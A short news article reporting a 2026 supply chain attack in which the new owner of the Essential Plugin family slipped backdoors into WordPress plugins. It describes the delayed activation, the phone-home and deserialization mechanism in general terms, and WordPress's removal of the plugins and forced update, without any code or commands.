More than 20,000 WordPress websites have been compromised following the discovery of a sophisticated supply chain attack in which a newly acquired plugin developer inserted hidden backdoors into more than 30 plugins, allowing malicious code to be silently distributed to any website running the affected software. The attack, which came to light after Austin Ginder, founder of web hosting firm Anchor Hosting, raised the alarm in a detailed blog post, has prompted WordPress to permanently remove all affected plugins from its official directory and issue security warnings to impacted site administrators.
The malicious company at the centre of the attack is called Essential Plugin, which claims its products have been installed more than 400,000 times and were being actively used by more than 15,000 customers, with the official WordPress repository showing more than 20,000 active installations at the time of the incident. According to Anchor Hosting’s investigation, version 2.6.7 of one of the affected plugins, Countdown Timer Ultimate, released on August 8, 2025, introduced the malicious code pathway while disguising the change behind a routine-looking compatibility note, with the attack then weaponised on April 5 and 6, 2026. The backdoor operated by phoning home to a server controlled by the attacker, pulling instructions, and using an unsafe deserialization flow to execute arbitrary code across infected installations, effectively giving the attacker remote control over every affected website without needing to breach each one individually.
The delayed activation is one of the most significant details of the entire incident. The malicious pathway was introduced in August 2025 but not activated until April 2026, a gap of several months that allowed the ownership transition to fade from immediate scrutiny and gave the attacker’s infrastructure time to blend into the normal update history of the plugins. Ginder warned that WordPress users are not notified of any plugin’s change in ownership, exposing users to potential takeover attacks by new owners, and noted that this is the second known hijacking of a WordPress plugin discovered in as many weeks. WordPress’s response on April 7, 2026 included sending security warnings directly to site owners’ admin dashboards, permanently closing all 26 plugins in the Essential Plugin family so they could no longer be installed from the official directory, and releasing a forced update on April 8 that added code to block the phone-home functionality connecting infected sites to the attacker’s server. However, security researchers noted that the forced update did not automatically clean already-infected configuration files on affected sites, meaning website owners must still manually audit their installations and remove any compromised plugins. Essential Plugin has not issued a public response to the incident.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
